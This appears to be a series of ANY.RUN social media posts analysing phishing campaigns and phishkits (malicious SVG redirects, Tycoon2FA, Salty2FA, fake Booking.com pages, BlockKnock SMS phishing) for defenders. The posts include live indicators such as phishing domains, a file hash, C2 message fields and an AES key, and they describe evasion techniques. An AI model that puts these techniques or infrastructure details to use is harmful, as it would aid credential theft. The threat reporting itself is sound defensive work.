🚨 Malicious SVG Leads to Microsoft-Themed #PhishKit.
⚠️ We observed a #phishing campaign that began with testing activity on September 10 and scaled into full spam activity by September 15. A legitimate domain was abused to host a malicious SVG disguised as a PDF. Attackers hide redirects and scripts inside images to bypass controls and social-engineer users into phishing flows.

🎯 This case shows a structured infrastructure similar to a #PhaaS framework, showing how attackers rely on robust, scalable models for mass credential harvesting, now a standard across the phishing ecosystem.

For enterprises, the risks are clear: blind spots in monitoring, delayed detection and response, and an increased risk of credential theft or data breach.

👨‍💻 When opened in a browser, the SVG displays a fake “protected document” message and redirects the user through several phishing domains. The chain includes Microsoft-themed lures such as:
🔹 loginmicrosft365[.]powerappsportals[.]com
🔹 loginmicr0sft0nlineofy[.]52632651246148569845521065[.]cc

❗️ The final phishing page mimics a Microsoft login and uses a #Cloudflare Turnstile widget to appear legitimate.

Unlike standard image formats, SVG is an XML-based document that can embed malicious JavaScript or hidden links. Here, the redirect was triggered by a script acting as an XOR decoder, which rebuilt and executed the redirect code via eval.

🎯 For SOC analysts, being able to trace every redirect step and uncover hidden payloads is critical to investigating phishing campaigns. See execution on a live system and collect #IOCs:
https://app.any.run/tasks/78f68113-7e05-44fc-968f-811c6a84463e?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoservice&utm_term=160925

For CISOs, the critical takeaway is that attackers exploit trusted platforms and brand impersonation to bypass defenses, directly threatening business resilience and user trust.

🔍 Use these TI Lookup search queries to expand visibility and enrich #IOCs with actionable threat context.
Suspicious SVG downloads:
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%7B%2522query%2522:%2522commandLine:%255C%2522Downloads%255C%255C%255C%255C*.svg%255C%2522%2522,%2522dateRange%2522:180%7D

Microsoft-themed phishing domains:
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%7B%2522query%2522:%2522domainName:%255C%2522microsoft.*.*%255C%2522%2522,%2522dateRange%2522:180%7D
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%257B%2522query%2522:%2522domainName:%255C%2522%255Eloginmicr?sft*.cc$%255C%2522%2522,%2522dateRange%2522:180%257D

IOCs:
Revised _payment_and_Benefitschart.pdf______-.svg
A7184bef39523bef32683ef7af440a5b2235e83e7fb83c6b7ee5f08286731892

Strengthen resilience and protect critical assets through proactive security with #ANYRUN 🚀

#cybersecurity #infosec

🚨 #Salty2FA is a new #phishkit linked to #Storm1575.
Active since June, it bypasses 2FA to gain access beyond stolen creds. Using a unique domain pattern and multi-stage chain, it targets finance, energy, telecom and more.

Read analysis: https://any.run/cybersecurity-blog/salty2fa-technical-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=salty2fa_analysis&utm_term=050925&utm_content=linktoblog

#cybersecurity #infosec

🪝 Since 2023, #Tycoon2FA has become the leading #phishing-as-a-service platform. As a low-cost #AiTM #phishkit, it lets threat actors steal user credentials and session cookies to bypass #MFA.

Learn more and see attack analysis: https://any.run/malware-trends/tycoon/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon&utm_content=linktomtt&utm_term=270825

#cybersecurity #infosec

🚨 #Salty2FA is a new #phishkit from #Storm1575 that has been evading detection since June

🎯 Targets finance, energy, and telecom companies in the US & EU
🪝 Steals creds and bypasses multiple 2FA methods

Read analysis of its attack chain 👇
https://any.run/cybersecurity-blog/salty2fa-technical-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=salty2fa_analysis&utm_term=190825&utm_content=linktoblog

#cybersecurity #infosec

🪝 Since 2023, #Tycoon2FA has become the leading #phishing-as-a-service platform.

As a low-cost #AiTM #phishkit, it lets threat actors steal user credentials from numerous companies.

👨‍💻 Learn more and see attack analysis: https://any.run/malware-trends/tycoon/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon&utm_content=linktomtt&utm_term=270525
#cybersecurity #infosec

From #phishing kits to #ransomware — 3 technical breakdowns from #ANYRUN you should know:
👾 #Tycoon2FA
#Phishkit bypassing MFA on M365 and Gmail, used in targeted credential theft campaigns: https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tech_articles&utm_term=220525&utm_content=linktoblog

👾 #Nitrogen
Ransomware group active since 2024, linked to attacks on U.S. financial institutions: https://any.run/cybersecurity-blog/nitrogen-ransomware-report/?utm_source=mastodon&utm_medium=post&utm_campaign=tech_articles&utm_term=220525&utm_content=linktoblog

👾 #Mamona
New ransomware with no exfiltration to C2, relying on fake leak threats: https://any.run/cybersecurity-blog/mamona-ransomware-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tech_articles&utm_term=220525&utm_content=linktoblog

Read these detailed reports for actionable insights to protect your business 🚀

🎁 Explore #ANYRUN's Birthday offers: https://app.any.run/plans/?utm_source=mastodon&utm_medium=post&utm_campaign=tech_articles&utm_term=220525&utm_content=linktopricing/

#cybersecurity #infosec

⚠️ #Tycoon2FA is a rapidly evolving #phishkit bypassing 2FA on M365 & Gmail
🔹 Multi-stage execution chain
🔹 Dynamic code generation & #obfuscation for stealth
🔹 Browser fingerprinting for targeted execution

Analysis of 27 observed evasion techniques👇
https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon2fa_analysis&utm_content=linktoblog&utm_term=150525

#cybersecurity #infosec

🪝 #Tycoon2FA is a #phishkit widely used to steal employee credentials across dozens of industries.

We've documented the evolution of its evasion mechanisms over the past 6 months.

Discover analysis of 27 techniques found in the latest attacks 👇
https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon2fa_analysis&utm_content=linktoblog&utm_term=130525

#infosec #cybersecurity

🚨 Fake Booking.com phishing pages used to deliver malware and steal data
⚠️ Attackers use #cybersquatting, mimicking Booking website to create legitimate-looking phishing pages that trick users into executing malicious actions.
Leveraging #ANYRUN's interactivity, security professionals can follow the entire infection chain and gather #IOCs.

👨‍💻 Case 1: The user is instructed to open the Run tool by pressing Win + R, then Ctrl + V to paste the script, and hit Enter. This sequence of actions executes a #malicious script that downloads and runs malware, in this case, #XWorm.
Take a look at the analysis: https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

🔍 TI Lookup request to find domains, IPs, and analysis sessions related to this campaign:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522mktoresp.com%255C%2522%2520AND%2520domainName:%255C%2522booking.*.%255C%2522%2522,%2522dateRange%2522:30%7D%20%20

🎯 Use this search query to find more examples of this fake #CAPTCHA technique and enhance your organization's security response:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522commandLine:%5C%2522

👨‍💻 Case 2: In this scenario, threat actors aim to steal victims’ banking information. It’s a typical phishing site that mimics Booking website and, after a few steps, prompts users to enter their card details to ‘verify’ their stay.
See example: https://app.any.run/tasks/87c49110-90ff-4833-8f65-af87e49fcc8d/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

📌 A key domain in this campaign, Iili[.]io, was also used by #Tycoon2FA #phishkit.
🔍 Use this TI Lookup query to find more examples:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522bzib.nelreports.net%255C%2522%2520AND%2520domainName:%255C%2522xpaywalletcdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522cdnjs.cloudflare.com%255C%2522%2520AND%2520domainName:%255C%2522xpaycdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522iili.io%255C%2522%2522,%2522dateRange%2522:180%7D%20

Investigate the latest #malware and #phishing attacks with #ANYRUN 🚀

#cybersecurity #infosec

🚨 #SMiShing phishkit targets victims in the US with fake parking payments (1/2 🧵)
⚠️ Media reports have highlighted widespread cases of parking payment fraud across the US, Canada, the UK, and other countries. #Phishing threats targeting smartphones are among the most dangerous scams in today's threat landscape.

By leveraging checks for distinctive features of mobile browsers, this type of phishing may not even work in desktop environments.

We’ve analyzed how this #phishkit, which we named BlockKnock, operates using the ANYRUN Interactive Sandbox.

📌 Setting the external IP to the United States and adjusting the browser to match the screen resolution of an iPhone 14 Pro Max successfully bypassed the checks, revealing the phishing page content. Use ANYRUN’s interactive environment for targeted investigations: enable residential proxies and use browser dev tools for in-depth analysis.

Take a look at the analysis: https://app.any.run/tasks/951d75e9-4d90-40f5-90cd-bf24dc5b6a69/?utm_source=mastodon&utm_medium=post&utm_campaign=parking_smishing&utm_content=linktoservice&utm_term=030225

The phishing page engine communicates with the #C2 server via the WebSocket protocol using the following fields:
⤴️ Client request
action: Client message type
uuid: Current session identifier
data: Client-side JSON request encrypted using AES-CBC and encoded in #Base64
siteCode: Phishing page type

⤵️ Server response
type: Server message type
data: Server-side JSON response encrypted using AES-CBC and encoded in Base64

AES key: bda1ba0338a0de9203b8f80fe81d9fd4

#cybersecurity #infosec